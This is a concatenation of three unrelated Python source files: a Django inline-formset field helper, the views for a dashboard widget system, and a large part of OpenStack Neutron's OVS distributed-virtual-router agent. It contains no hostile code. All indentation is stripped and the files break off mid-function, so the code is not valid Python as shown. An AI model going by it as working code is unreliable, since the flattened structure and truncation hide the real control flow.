return self._html_output(self.form.as_p, u'<p>%(label)s %(help_text)s</p>%(field)s', u' %s', p_sections_re, p_row_re)
def full_clean(self):
self.form.full_clean()
for bf in self.formsets:
bf.formset.full_clean()
def has_changed(self):
result = self.form.has_changed()
for bf in self.formsets:
result = bf.formset.has_changed() or result
return result
def is_multipart(self):
result = self.form.is_multipart()
for bf in self.formsets:
result = bf.formset.is_multipart() or result
return result
from django.forms.fields import Field
from django.forms.widgets import Widget
from django.forms.models import inlineformset_factory
class FormSetWidget(Widget):
def __init__(self, field, attrs=None):
super(FormSetWidget, self).__init__(attrs)
self.field = field
def render(self, name, value, attrs=None):
if value is None: value = 'FormWithSets decorator required to render %s FormSet' % self.field.model.__name__
value = force_unicode(value)
final_attrs = self.build_attrs(attrs, name=name)
return mark_safe(conditional_escape(value))
class FormSetField(Field):
def __init__(self, model, widget=FormSetWidget, label=None, initial=None,
help_text=None, error_messages=None, show_hidden_initial=False,
formset_factory=inlineformset_factory, *args, **kwargs):
widget = widget(self)
super(FormSetField, self).__init__(required=False, widget=widget, label=label, initial=initial, help_text=help_text, error_messages=error_messages, show_hidden_initial=show_hidden_initial)
self.model = model
self.formset_factory = formset_factory
self.args = args
self.kwargs = kwargs
def make_formset(self, parent_model):
return self.formset_factory(parent_model, self.model, *self.args, **self.kwargs)
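# Hedged usage sketch (the Invoice/InvoiceItem models are hypothetical): a
# parent ModelForm declares a FormSetField for a related model, then the form
# class is wrapped with FormWithSets so the inline formset is rendered,
# validated and saved together with the parent form.
#
#   class InvoiceForm(forms.ModelForm):
#       items = FormSetField(InvoiceItem)
#       class Meta:
#           model = Invoice
#
#   InvoiceForm = FormWithSets(InvoiceForm)
#   form = InvoiceForm(request.POST or None)
#   if form.is_valid():
#       form.save()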
|
|
"""
Core module Dashboard views
"""
from anaf.core.rendering import render_to_response
from django.shortcuts import get_object_or_404
from django.template import RequestContext
from django.http import HttpResponseRedirect
from django.core.urlresolvers import reverse
from anaf.core.decorators import mylogin_required, handle_response_format
from anaf.core.models import Object, Widget
from forms import WidgetForm
from anaf.core.conf import settings
from jinja2 import Markup
import json
import re
import copy
def _preprocess_widget(widget, name):
"Populates widget with missing fields"
module_name = widget['module_name']
import_name = module_name + ".views"
module_views = __import__(import_name, fromlist=[str(module_name)])
if hasattr(module_views, name):
if 'title' not in widget:
widget['title'] = getattr(module_views, name).__doc__
widget = copy.deepcopy(widget)
if 'view' not in widget:
widget['view'] = getattr(module_views, name)
return widget
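# Illustration (the module name 'myapp' is hypothetical): a widgets.py entry
# such as {'tasks_summary': {'module_name': 'myapp'}} comes back from
# _preprocess_widget() with 'title' filled from the docstring of
# myapp.views.tasks_summary and 'view' bound to that callable.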
def _get_all_widgets(request):
"Retrieve widgets from all available modules"
user = request.user.profile
perspective = user.get_perspective()
modules = perspective.get_modules()
widgets = {}
# For each Module in the Perspective get widgets
for module in modules:
try:
import_name = module.name + ".widgets"
module_widget_lib = __import__(
import_name, fromlist=[str(module.name)])
module_widgets = module_widget_lib.get_widgets(request)
# Preprocess widget, ensure it has all required fields
for name in module_widgets:
if 'module_name' not in module_widgets[name]:
module_widgets[name]['module_name'] = module.name
if 'module_title' not in module_widgets[name]:
module_widgets[name]['module_title'] = module.title
module_widgets[name] = _preprocess_widget(
module_widgets[name], name)
widgets.update(module_widgets)
except ImportError:
pass
except AttributeError:
pass
return widgets
def _get_widget(request, module, widget_name):
"Gets a widget by name"
import_name = module.name + ".widgets"
module_widget_lib = __import__(import_name, fromlist=[str(module.name)])
module_widgets = module_widget_lib.get_widgets(request)
widget = {}
# Preprocess widget, ensure it has all required fields
for name in module_widgets:
if name == widget_name:
widget = module_widgets[name]
if 'module_name' not in widget:
widget['module_name'] = module.name
if 'module_title' not in widget:
widget['module_title'] = module.title
widget = _preprocess_widget(widget, widget_name)
break
return widget
def _create_widget_object(request, module_name, widget_name):
"Create a Widget object if one is available for the current user Perspective"
user = request.user.profile
perspective = user.get_perspective()
modules = perspective.get_modules()
obj = None
current_module = modules.filter(name=module_name)
widget = None
if current_module:
current_module = current_module[0]
widget = _get_widget(request, current_module, widget_name)
if widget:
obj = Widget(user=user, perspective=perspective)
obj.module_name = widget['module_name']
obj.widget_name = widget_name
obj.save()
# except Exception:
# pass
return obj
def _get_widget_content(content, response_format='html'):
"Extracts widget content from rendred HTML"
widget_content = ""
regexp = r"<!-- widget_content -->(?P<widget_content>.*?)<!-- /widget_content -->"
if response_format == 'ajax':
try:
ajax_content = json.loads(content)
widget_content = ajax_content['response'][
'content']['module_content']
except:
blocks = re.finditer(regexp, content, re.DOTALL)
for block in blocks:
widget_content = block.group('widget_content').strip()
else:
blocks = re.finditer(regexp, content, re.DOTALL)
for block in blocks:
widget_content = block.group('widget_content').strip()
return Markup(widget_content)
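# Illustration of the expected markup: a widget view's rendered output wraps
# its payload in marker comments, e.g.
#   <!-- widget_content --><ul><li>3 open tasks</li></ul><!-- /widget_content -->
# and _get_widget_content() returns only the inner fragment as a Markup
# object (for 'ajax' responses it first tries the JSON 'module_content' key).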
@handle_response_format
@mylogin_required
def index(request, response_format='html'):
"Homepage"
trash = Object.filter_by_request(request, manager=Object.objects.filter(trash=True),
mode='r', filter_trash=False).count()
user = request.user.profile
perspective = user.get_perspective()
widget_objects = Widget.objects.filter(user=user, perspective=perspective)
clean_widgets = []
for widget_object in widget_objects:
try:
module = perspective.get_modules().filter(
name=widget_object.module_name)[0]
widget = _get_widget(request, module, widget_object.widget_name)
if 'view' in widget:
try:
content = unicode(
widget['view'](request, response_format=response_format).content, 'utf_8')
widget_content = _get_widget_content(
content, response_format=response_format)
except Exception, e:
widget_content = ""
if settings.DEBUG:
widget_content = str(e)
widget['content'] = widget_content
if widget:
widget_object.widget = widget
clean_widgets.append(widget_object)
except IndexError:
widget_object.delete()
return render_to_response('core/dashboard/index',
{'trash': trash,
'widgets': clean_widgets},
context_instance=RequestContext(request), response_format=response_format)
@handle_response_format
@mylogin_required
def dashboard_widget_add(request, module_name=None, widget_name=None, response_format='html'):
"Add a Widget to the Dashboard"
trash = Object.filter_by_request(request, manager=Object.objects.filter(trash=True),
mode='r', filter_trash=False).count()
if module_name and widget_name:
widget = _create_widget_object(request, module_name, widget_name)
if widget:
return HttpResponseRedirect(reverse('core_dashboard_index'))
widgets = _get_all_widgets(request)
return render_to_response('core/dashboard/widget_add',
{'trash': trash,
'widgets': widgets},
context_instance=RequestContext(request), response_format=response_format)
@handle_response_format
@mylogin_required
def dashboard_widget_edit(request, widget_id, response_format='html'):
"Edit an existing Widget on the Dashboard"
user = request.user.profile
widget_object = get_object_or_404(Widget, pk=widget_id)
if widget_object.user == user:
perspective = user.get_perspective()
module = perspective.get_modules().filter(
name=widget_object.module_name)[0]
widget = _get_widget(request, module, widget_object.widget_name)
widget_object.widget = widget
if 'view' in widget:
try:
content = unicode(
widget['view'](request, response_format=response_format).content, 'utf_8')
widget_content = _get_widget_content(
content, response_format=response_format)
except Exception:
widget_content = ""
widget['content'] = widget_content
if request.POST:
form = WidgetForm(user, request.POST, instance=widget_object)
if form.is_valid():
form.save()
return HttpResponseRedirect(reverse('core_dashboard_index'))
else:
form = WidgetForm(user, instance=widget_object)
return render_to_response('core/dashboard/widget_edit',
{'widget': widget_object,
'form': form},
context_instance=RequestContext(request), response_format=response_format)
return HttpResponseRedirect(reverse('home'))
@handle_response_format
@mylogin_required
def dashboard_widget_delete(request, widget_id, response_format='html'):
"Delete an existing Widget from the Dashboard"
widget = get_object_or_404(Widget, pk=widget_id)
if widget.user == request.user.profile:
widget.delete()
return HttpResponseRedirect(reverse('core_dashboard_index'))
@handle_response_format
@mylogin_required
def dashboard_widget_arrange(request, panel='left', response_format='html'):
"Arrange widgets with AJAX request"
user = request.user.profile
if panel == 'left' or not panel:
shift = -100
else:
shift = 100
if request.GET and 'id_widget[]' in request.GET:
widget_ids = request.GET.getlist('id_widget[]')
widgets = Widget.objects.filter(user=user, pk__in=widget_ids)
for widget in widgets:
if unicode(widget.id) in widget_ids:
widget.weight = shift + widget_ids.index(unicode(widget.id))
widget.save()
return HttpResponseRedirect(reverse('core_dashboard_index'))
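# Illustrative sketch (not part of the original views): dashboard_widget_arrange()
# above encodes panel membership in the weight sign -- left-panel widgets get
# weights starting at -100, other panels at +100, ordered by position in the
# submitted id list. The ids passed in are fabricated for demonstration only.
def _example_arrange_weights(widget_ids, panel='left'):
    shift = -100 if panel == 'left' or not panel else 100
    return dict((wid, shift + index) for index, wid in enumerate(widget_ids))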
|
|
# Copyright 2014, Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
import oslo_messaging
from oslo_utils import excutils
from neutron.common import constants as n_const
from neutron.common import utils as n_utils
from neutron.i18n import _LE, _LI, _LW
from neutron.plugins.common import constants as p_const
from neutron.plugins.openvswitch.common import constants
LOG = logging.getLogger(__name__)
# A class to represent a DVR-hosted subnet including vif_ports resident on
# that subnet
class LocalDVRSubnetMapping(object):
def __init__(self, subnet, csnat_ofport=constants.OFPORT_INVALID):
        # set of compute ports on this dvr subnet
self.compute_ports = {}
self.subnet = subnet
self.csnat_ofport = csnat_ofport
self.dvr_owned = False
def __str__(self):
return ("subnet = %s compute_ports = %s csnat_port = %s"
" is_dvr_owned = %s" %
(self.subnet, self.get_compute_ofports(),
self.get_csnat_ofport(), self.is_dvr_owned()))
def get_subnet_info(self):
return self.subnet
def set_dvr_owned(self, owned):
self.dvr_owned = owned
def is_dvr_owned(self):
return self.dvr_owned
def add_compute_ofport(self, vif_id, ofport):
self.compute_ports[vif_id] = ofport
def remove_compute_ofport(self, vif_id):
self.compute_ports.pop(vif_id, 0)
def remove_all_compute_ofports(self):
self.compute_ports.clear()
def get_compute_ofports(self):
return self.compute_ports
def set_csnat_ofport(self, ofport):
self.csnat_ofport = ofport
def get_csnat_ofport(self):
return self.csnat_ofport
class OVSPort(object):
def __init__(self, id, ofport, mac, device_owner):
self.id = id
self.mac = mac
self.ofport = ofport
self.subnets = set()
self.device_owner = device_owner
def __str__(self):
return ("OVSPort: id = %s, ofport = %s, mac = %s, "
"device_owner = %s, subnets = %s" %
(self.id, self.ofport, self.mac,
self.device_owner, self.subnets))
def add_subnet(self, subnet_id):
self.subnets.add(subnet_id)
def remove_subnet(self, subnet_id):
self.subnets.remove(subnet_id)
def remove_all_subnets(self):
self.subnets.clear()
def get_subnets(self):
return self.subnets
def get_device_owner(self):
return self.device_owner
def get_mac(self):
return self.mac
def get_ofport(self):
return self.ofport
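# Illustrative sketch (not part of the upstream agent): shows how the two
# bookkeeping structures above are meant to be used together. A subnet gets a
# LocalDVRSubnetMapping, compute vif ofports are registered on it, and each
# vif is also tracked as an OVSPort. The subnet dict, ids and MAC below are
# fabricated for demonstration only.
def _example_dvr_bookkeeping():
    subnet_info = {'id': 'subnet-1', 'gateway_ip': '10.0.0.1',
                   'gateway_mac': 'fa:16:3e:00:00:01', 'ip_version': 4}
    ldm = LocalDVRSubnetMapping(subnet_info)
    ldm.set_dvr_owned(True)
    port = OVSPort('vif-1', ofport=6, mac='fa:16:3e:aa:bb:cc',
                   device_owner='compute:nova')
    port.add_subnet('subnet-1')
    ldm.add_compute_ofport(port.id, port.get_ofport())
    # The mapping now reports one compute ofport for this dvr-owned subnet.
    return ldm.get_compute_ofports(), port.get_subnets()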
class OVSDVRNeutronAgent(object):
'''
    Implements OVS-based DVR (Distributed Virtual Router) for overlay networks.
'''
# history
# 1.0 Initial version
def __init__(self, context, plugin_rpc, integ_br, tun_br,
bridge_mappings, phys_brs, int_ofports, phys_ofports,
patch_int_ofport=constants.OFPORT_INVALID,
patch_tun_ofport=constants.OFPORT_INVALID,
host=None, enable_tunneling=False,
enable_distributed_routing=False):
self.context = context
self.plugin_rpc = plugin_rpc
self.host = host
self.enable_tunneling = enable_tunneling
self.enable_distributed_routing = enable_distributed_routing
self.bridge_mappings = bridge_mappings
self.phys_brs = phys_brs
self.int_ofports = int_ofports
self.phys_ofports = phys_ofports
self.reset_ovs_parameters(integ_br, tun_br,
patch_int_ofport, patch_tun_ofport)
self.reset_dvr_parameters()
self.dvr_mac_address = None
if self.enable_distributed_routing:
self.get_dvr_mac_address()
def setup_dvr_flows(self):
self.setup_dvr_flows_on_integ_br()
self.setup_dvr_flows_on_tun_br()
self.setup_dvr_flows_on_phys_br()
self.setup_dvr_mac_flows_on_all_brs()
def reset_ovs_parameters(self, integ_br, tun_br,
patch_int_ofport, patch_tun_ofport):
'''Reset the openvswitch parameters'''
self.int_br = integ_br
self.tun_br = tun_br
self.patch_int_ofport = patch_int_ofport
self.patch_tun_ofport = patch_tun_ofport
def reset_dvr_parameters(self):
'''Reset the DVR parameters'''
self.local_dvr_map = {}
self.local_csnat_map = {}
self.local_ports = {}
self.registered_dvr_macs = set()
def get_dvr_mac_address(self):
try:
self.get_dvr_mac_address_with_retry()
except oslo_messaging.RemoteError as e:
LOG.warning(_LW('L2 agent could not get DVR MAC address at '
'startup due to RPC error. It happens when the '
'server does not support this RPC API. Detailed '
'message: %s'), e)
except oslo_messaging.MessagingTimeout:
LOG.error(_LE('DVR: Failed to obtain a valid local '
'DVR MAC address - L2 Agent operating '
'in Non-DVR Mode'))
if not self.in_distributed_mode():
# switch all traffic using L2 learning
# REVISIT(yamamoto): why to install the same flow as
# setup_integration_br?
self.int_br.install_normal()
def get_dvr_mac_address_with_retry(self):
# Get the local DVR MAC Address from the Neutron Server.
# This is the first place where we contact the server on startup
# so retry in case it's not ready to respond
for retry_count in reversed(range(5)):
try:
details = self.plugin_rpc.get_dvr_mac_address_by_host(
self.context, self.host)
except oslo_messaging.MessagingTimeout as e:
with excutils.save_and_reraise_exception() as ctx:
if retry_count > 0:
ctx.reraise = False
LOG.warning(_LW('L2 agent could not get DVR MAC '
'address from server. Retrying. '
'Detailed message: %s'), e)
else:
LOG.debug("L2 Agent DVR: Received response for "
"get_dvr_mac_address_by_host() from "
"plugin: %r", details)
self.dvr_mac_address = details['mac_address']
return
def setup_dvr_flows_on_integ_br(self):
        '''Set up initial dvr flows into br-int'''
if not self.in_distributed_mode():
return
LOG.info(_LI("L2 Agent operating in DVR Mode with MAC %s"),
self.dvr_mac_address)
# Remove existing flows in integration bridge
self.int_br.delete_flows()
# Add a canary flow to int_br to track OVS restarts
self.int_br.setup_canary_table()
# Insert 'drop' action as the default for Table DVR_TO_SRC_MAC
self.int_br.install_drop(table_id=constants.DVR_TO_SRC_MAC, priority=1)
self.int_br.install_drop(table_id=constants.DVR_TO_SRC_MAC_VLAN,
priority=1)
# Insert 'normal' action as the default for Table LOCAL_SWITCHING
self.int_br.install_normal(table_id=constants.LOCAL_SWITCHING,
priority=1)
for physical_network in self.bridge_mappings:
self.int_br.install_drop(table_id=constants.LOCAL_SWITCHING,
priority=2,
in_port=self.int_ofports[
physical_network])
def setup_dvr_flows_on_tun_br(self):
        '''Set up initial dvr flows into br-tun'''
if not self.enable_tunneling or not self.in_distributed_mode():
return
self.tun_br.install_goto(dest_table_id=constants.DVR_PROCESS,
priority=1,
in_port=self.patch_int_ofport)
# table-miss should be sent to learning table
self.tun_br.install_goto(table_id=constants.DVR_NOT_LEARN,
dest_table_id=constants.LEARN_FROM_TUN)
self.tun_br.install_goto(table_id=constants.DVR_PROCESS,
dest_table_id=constants.PATCH_LV_TO_TUN)
def setup_dvr_flows_on_phys_br(self):
        '''Set up initial dvr flows into br-phys'''
if not self.in_distributed_mode():
return
for physical_network in self.bridge_mappings:
self.phys_brs[physical_network].install_goto(
in_port=self.phys_ofports[physical_network],
priority=2,
dest_table_id=constants.DVR_PROCESS_VLAN)
self.phys_brs[physical_network].install_goto(
priority=1,
dest_table_id=constants.DVR_NOT_LEARN_VLAN)
self.phys_brs[physical_network].install_goto(
table_id=constants.DVR_PROCESS_VLAN,
priority=0,
dest_table_id=constants.LOCAL_VLAN_TRANSLATION)
self.phys_brs[physical_network].install_drop(
table_id=constants.LOCAL_VLAN_TRANSLATION,
in_port=self.phys_ofports[physical_network],
priority=2)
self.phys_brs[physical_network].install_normal(
table_id=constants.DVR_NOT_LEARN_VLAN,
priority=1)
def _add_dvr_mac_for_phys_br(self, physical_network, mac):
self.int_br.add_dvr_mac_vlan(mac=mac,
port=self.int_ofports[physical_network])
phys_br = self.phys_brs[physical_network]
phys_br.add_dvr_mac_vlan(mac=mac,
port=self.phys_ofports[physical_network])
def _remove_dvr_mac_for_phys_br(self, physical_network, mac):
# REVISIT(yamamoto): match in_port as well?
self.int_br.remove_dvr_mac_vlan(mac=mac)
phys_br = self.phys_brs[physical_network]
# REVISIT(yamamoto): match in_port as well?
phys_br.remove_dvr_mac_vlan(mac=mac)
def _add_dvr_mac_for_tun_br(self, mac):
self.int_br.add_dvr_mac_tun(mac=mac, port=self.patch_tun_ofport)
self.tun_br.add_dvr_mac_tun(mac=mac, port=self.patch_int_ofport)
def _remove_dvr_mac_for_tun_br(self, mac):
self.int_br.remove_dvr_mac_tun(mac=mac, port=self.patch_tun_ofport)
# REVISIT(yamamoto): match in_port as well?
self.tun_br.remove_dvr_mac_tun(mac=mac)
def _add_dvr_mac(self, mac):
for physical_network in self.bridge_mappings:
self._add_dvr_mac_for_phys_br(physical_network, mac)
if self.enable_tunneling:
self._add_dvr_mac_for_tun_br(mac)
LOG.debug("Added DVR MAC flow for %s", mac)
self.registered_dvr_macs.add(mac)
def _remove_dvr_mac(self, mac):
for physical_network in self.bridge_mappings:
self._remove_dvr_mac_for_phys_br(physical_network, mac)
if self.enable_tunneling:
self._remove_dvr_mac_for_tun_br(mac)
LOG.debug("Removed DVR MAC flow for %s", mac)
self.registered_dvr_macs.remove(mac)
def setup_dvr_mac_flows_on_all_brs(self):
if not self.in_distributed_mode():
LOG.debug("Not in distributed mode, ignoring invocation "
"of get_dvr_mac_address_list() ")
return
dvr_macs = self.plugin_rpc.get_dvr_mac_address_list(self.context)
LOG.debug("L2 Agent DVR: Received these MACs: %r", dvr_macs)
for mac in dvr_macs:
if mac['mac_address'] == self.dvr_mac_address:
continue
self._add_dvr_mac(mac['mac_address'])
def dvr_mac_address_update(self, dvr_macs):
if not self.dvr_mac_address:
LOG.debug("Self mac unknown, ignoring this "
"dvr_mac_address_update() ")
return
dvr_host_macs = set()
for entry in dvr_macs:
if entry['mac_address'] == self.dvr_mac_address:
continue
dvr_host_macs.add(entry['mac_address'])
if dvr_host_macs == self.registered_dvr_macs:
LOG.debug("DVR Mac address already up to date")
return
dvr_macs_added = dvr_host_macs - self.registered_dvr_macs
dvr_macs_removed = self.registered_dvr_macs - dvr_host_macs
for oldmac in dvr_macs_removed:
self._remove_dvr_mac(oldmac)
for newmac in dvr_macs_added:
self._add_dvr_mac(newmac)
def in_distributed_mode(self):
return self.dvr_mac_address is not None
def is_dvr_router_interface(self, device_owner):
return device_owner == n_const.DEVICE_OWNER_DVR_INTERFACE
def process_tunneled_network(self, network_type, lvid, segmentation_id):
self.tun_br.provision_local_vlan(
network_type=network_type,
lvid=lvid,
segmentation_id=segmentation_id,
distributed=self.in_distributed_mode())
def _bind_distributed_router_interface_port(self, port, lvm,
fixed_ips, device_owner):
# since distributed router port must have only one fixed
# IP, directly use fixed_ips[0]
fixed_ip = fixed_ips[0]
subnet_uuid = fixed_ip['subnet_id']
csnat_ofport = constants.OFPORT_INVALID
ldm = None
if subnet_uuid in self.local_dvr_map:
ldm = self.local_dvr_map[subnet_uuid]
csnat_ofport = ldm.get_csnat_ofport()
if csnat_ofport == constants.OFPORT_INVALID:
LOG.error(_LE("DVR: Duplicate DVR router interface detected "
"for subnet %s"), subnet_uuid)
return
else:
# set up LocalDVRSubnetMapping available for this subnet
subnet_info = self.plugin_rpc.get_subnet_for_dvr(self.context,
subnet_uuid)
if not subnet_info:
LOG.error(_LE("DVR: Unable to retrieve subnet information "
"for subnet_id %s"), subnet_uuid)
return
LOG.debug("get_subnet_for_dvr for subnet %(uuid)s "
"returned with %(info)s",
{"uuid": subnet_uuid, "info": subnet_info})
ldm = LocalDVRSubnetMapping(subnet_info)
self.local_dvr_map[subnet_uuid] = ldm
# DVR takes over
ldm.set_dvr_owned(True)
vlan_to_use = lvm.vlan
if lvm.network_type == p_const.TYPE_VLAN:
vlan_to_use = lvm.segmentation_id
subnet_info = ldm.get_subnet_info()
ip_version = subnet_info['ip_version']
local_compute_ports = (
self.plugin_rpc.get_ports_on_host_by_subnet(
self.context, self.host, subnet_uuid))
LOG.debug("DVR: List of ports received from "
"get_ports_on_host_by_subnet %s",
local_compute_ports)
for prt in local_compute_ports:
vif = self.int_br.get_vif_port_by_id(prt['id'])
if not vif:
continue
ldm.add_compute_ofport(vif.vif_id, vif.ofport)
if vif.vif_id in self.local_ports:
                # check whether this compute port is already on
                # a different dvr routed subnet;
                # if so, queue this subnet to that port
comp_ovsport = self.local_ports[vif.vif_id]
comp_ovsport.add_subnet(subnet_uuid)
else:
                # this is the first time the compute port is seen on a
                # dvr routed subnet, so queue this subnet to that port
comp_ovsport = OVSPort(vif.vif_id, vif.ofport,
vif.vif_mac, prt['device_owner'])
comp_ovsport.add_subnet(subnet_uuid)
self.local_ports[vif.vif_id] = comp_ovsport
# create rule for just this vm port
self.int_br.install_dvr_to_src_mac(
network_type=lvm.network_type,
vlan_tag=vlan_to_use,
gateway_mac=subnet_info['gateway_mac'],
dst_mac=comp_ovsport.get_mac(),
dst_port=comp_ovsport.get_ofport())
if lvm.network_type == p_const.TYPE_VLAN:
# TODO(vivek) remove the IPv6 related flows once SNAT is not
# used for IPv6 DVR.
br = self.phys_brs[lvm.physical_network]
if lvm.network_type in constants.TUNNEL_NETWORK_TYPES:
br = self.tun_br
# TODO(vivek) remove the IPv6 related flows once SNAT is not
# used for IPv6 DVR.
if ip_version == 4:
br.install_dvr_process_ipv4(
vlan_tag=lvm.vlan, gateway_ip=subnet_info['gateway_ip'])
else:
br.install_dvr_process_ipv6(
vlan_tag=lvm.vlan, gateway_mac=subnet_info['gateway_mac'])
br.install_dvr_process(
vlan_tag=lvm.vlan, vif_mac=port.vif_mac,
dvr_mac_address=self.dvr_mac_address)
# the dvr router interface is itself a port, so capture it
# queue this subnet to that port. A subnet appears only once as
# a router interface on any given router
ovsport = OVSPort(port.vif_id, port.ofport,
port.vif_mac, device_owner)
ovsport.add_subnet(subnet_uuid)
self.local_ports[port.vif_id] = ovsport
def _bind_port_on_dvr_subnet(self, port, lvm, fixed_ips,
device_owner):
# Handle new compute port added use-case
subnet_uuid = None
for ips in fixed_ips:
if ips['subnet_id'] not in self.local_dvr_map:
continue
subnet_uuid = ips['subnet_id']
ldm = self.local_dvr_map[subnet_uuid]
if not ldm.is_dvr_owned():
# well this is CSNAT stuff, let dvr come in
# and do plumbing for this vm later
continue
# This confirms that this compute port belongs
# to a dvr hosted subnet.
# Accommodate this VM Port into the existing rule in
# the integration bridge
LOG.debug("DVR: Plumbing compute port %s", port.vif_id)
subnet_info = ldm.get_subnet_info()
ldm.add_compute_ofport(port.vif_id, port.ofport)
if port.vif_id in self.local_ports:
            # check whether this compute port is already on a different
            # dvr routed subnet;
            # if so, queue this subnet to that port
ovsport = self.local_ports[port.vif_id]
ovsport.add_subnet(subnet_uuid)
else:
                # this is the first time the compute port is seen on a
                # dvr routed subnet, so queue this subnet to that port
ovsport = OVSPort(port.vif_id, port.ofport,
port.vif_mac, device_owner)
ovsport.add_subnet(subnet_uuid)
self.local_ports[port.vif_id] = ovsport
vlan_to_use = lvm.vlan
if lvm.network_type == p_const.TYPE_VLAN:
vlan_to_use = lvm.segmentation_id
# create a rule for this vm port
self.int_br.install_dvr_to_src_mac(
network_type=lvm.network_type,
vlan_tag=vlan_to_use,
gateway_mac=subnet_info['gateway_mac'],
dst_mac=ovsport.get_mac(),
dst_port=ovsport.get_ofport())
def _bind_centralized_snat_port_on_dvr_subnet(self, port, lvm,
fixed_ips, device_owner):
# since centralized-SNAT (CSNAT) port must have only one fixed
# IP, directly use fixed_ips[0]
fixed_ip = fixed_ips[0]
if port.vif_id in self.local_ports:
# throw an error if CSNAT port is already on a different
# dvr routed subnet
ovsport = self.local_ports[port.vif_id]
subs = list(ovsport.get_subnets())
if subs[0] == fixed_ip['subnet_id']:
return
LOG.error(_LE("Centralized-SNAT port %(port)s on subnet "
"%(port_subnet)s already seen on a different "
"subnet %(orig_subnet)s"), {
"port": port.vif_id,
"port_subnet": fixed_ip['subnet_id'],
"orig_subnet": subs[0],
})
return
subnet_uuid = fixed_ip['subnet_id']
ldm = None
subnet_info = None
if subnet_uuid not in self.local_dvr_map:
# no csnat ports seen on this subnet - create csnat state
# for this subnet
subnet_info = self.plugin_rpc.get_subnet_for_dvr(self.context,
subnet_uuid)
ldm = LocalDVRSubnetMapping(subnet_info, port.ofport)
self.local_dvr_map[subnet_uuid] = ldm
else:
ldm = self.local_dvr_map[subnet_uuid]
subnet_info = ldm.get_subnet_info()
# Store csnat OF Port in the existing DVRSubnetMap
ldm.set_csnat_ofport(port.ofport)
# create ovsPort footprint for csnat port
ovsport = OVSPort(port.vif_id, port.ofport,
port.vif_mac, device_owner)
ovsport.add_subnet(subnet_uuid)
self.local_ports[port.vif_id] = ovsport
vlan_to_use = lvm.vlan
if lvm.network_type == p_const.TYPE_VLAN:
vlan_to_use = lvm.segmentation_id
self.int_br.install_dvr_to_src_mac(
network_type=lvm.network_type,
vlan_tag=vlan_to_use,
gateway_mac=subnet_info['gateway_mac'],
dst_mac=ovsport.get_mac(),
dst_port=ovsport.get_ofport())
def bind_port_to_dvr(self, port, local_vlan_map,
fixed_ips, device_owner):
if not self.in_distributed_mode():
return
if local_vlan_map.network_type not in (constants.TUNNEL_NETWORK_TYPES
+ [p_const.TYPE_VLAN]):
LOG.debug("DVR: Port %s is with network_type %s not supported"
" for dvr plumbing" % (port.vif_id,
local_vlan_map.network_type))
return
if device_owner == n_const.DEVICE_OWNER_DVR_INTERFACE:
self._bind_distributed_router_interface_port(port,
local_vlan_map,
fixed_ips,
device_owner)
if device_owner and n_utils.is_dvr_serviced(device_owner):
self._bind_port_on_dvr_subnet(port, local_vlan_map,
fixed_ips,
device_owner)
if device_owner == n_const.DEVICE_OWNER_ROUTER_SNAT:
self._bind_centralized_snat_port_on_dvr_subnet(port,
local_vlan_map,
fixed_ips,
device_owner)
def _unbind_distributed_router_interface_port(self, port, lvm):
ovsport = self.local_ports[port.vif_id]
# removal of distributed router interface
subnet_ids = ovsport.get_subnets()
subnet_set = set(subnet_ids)
network_type = lvm.network_type
physical_network = lvm.physical_network
vlan_to_use = lvm.vlan
if network_type == p_const.TYPE_VLAN:
vlan_to_use = lvm.segmentation_id
# ensure we process for all the subnets laid on this removed port
for sub_uuid in subnet_set:
if sub_uuid not in self.local_dvr_map:
continue
ldm = self.local_dvr_map[sub_uuid]
subnet_info = ldm.get_subnet_info()
ip_version = subnet_info['ip_version']
# DVR is no more owner
ldm.set_dvr_owned(False)
# remove all vm rules for this dvr subnet
# clear of compute_ports altogether
compute_ports = ldm.get_compute_ofports()
for vif_id in compute_ports:
comp_port = self.local_ports[vif_id]
self.int_br.delete_dvr_to_src_mac(
network_type=network_type,
vlan_tag=vlan_to_use, dst_mac=comp_port.get_mac())
ldm.remove_all_compute_ofports()
if ldm.get_csnat_ofport() == constants.OFPORT_INVALID:
# if there is no csnat port for this subnet, remove
# this subnet from local_dvr_map, as no dvr (or) csnat
# ports available on this agent anymore
self.local_dvr_map.pop(sub_uuid, None)
if network_type == p_const.TYPE_VLAN:
                br = self.phys_brs[physical_network]
if network_type in constants.TUNNEL_NETWORK_TYPES:
br = self.tun_br
if ip_version == 4:
br.delete_dvr_process_ipv4(
vlan_tag=lvm.vlan, gateway_ip=subnet_info['gateway_ip'])
else:
br.delete_dvr_process_ipv6(
vlan_tag=lvm.vlan, gateway_mac=subnet_info['gateway_mac'])
ovsport.remove_subnet(sub_uuid)
if lvm.network_type == p_const.TYPE_VLAN:
            br = self.phys_brs[physical_network]
if lvm.network_type in constants.TUNNEL_NETWORK_TYPES:
br = self.tun_br
br.delete_dvr_process(vlan_tag=lvm.vlan, vif_mac=port.vif_mac)
# release port state
self.local_ports.pop(port.vif_id, None)
def _unbind_port_on_dvr_subnet(self, port, lvm):
ovsport = self.local_ports[port.vif_id]
# This confirms that this compute port being removed belonged
# to a dvr hosted subnet.
LOG.debug("DVR: Removing plumbing for compute port %s", port)
subnet_ids = ovsport.get_subnets()
# ensure we process for all the subnets laid on this port
for sub_uuid in subnet_ids:
if sub_uuid not in self.local_dvr_map:
continue
ldm = self.local_dvr_map[sub_uuid]
ldm.remove_compute_ofport(port.vif_id)
vlan_to_use = lvm.vlan
if lvm.network_type == p_const.TYPE_VLAN:
vlan_to_use = lvm.segmentation_id
# first remove this vm port rule
self.int_br.delete_dvr_to_src_mac(
network_type=lvm.network_type,
vlan_tag=vlan_to_use, dst_mac=ovsport.get_mac())
# release port state
self.local_ports.pop(port.vif_id, None)
def _unbind_centralized_snat_port_on_dvr_subnet(self, port, lvm):
ovsport = self.local_ports[port.vif_id]
# This confirms that this compute port being removed belonged
# to a dvr hosted subnet.
LOG.debug("DVR: Removing plumbing for csnat port %s", port)
sub_uuid = list(ovsport.get_subnets())[0]
# ensure we process for all the subnets laid on this port
if sub_uuid not in self.local_dvr_map:
return
ldm = self.local_dvr_map[sub_uuid]
ldm.set_csnat_ofport(constants.OFPORT_INVALID)
vlan_to_use = lvm.vlan
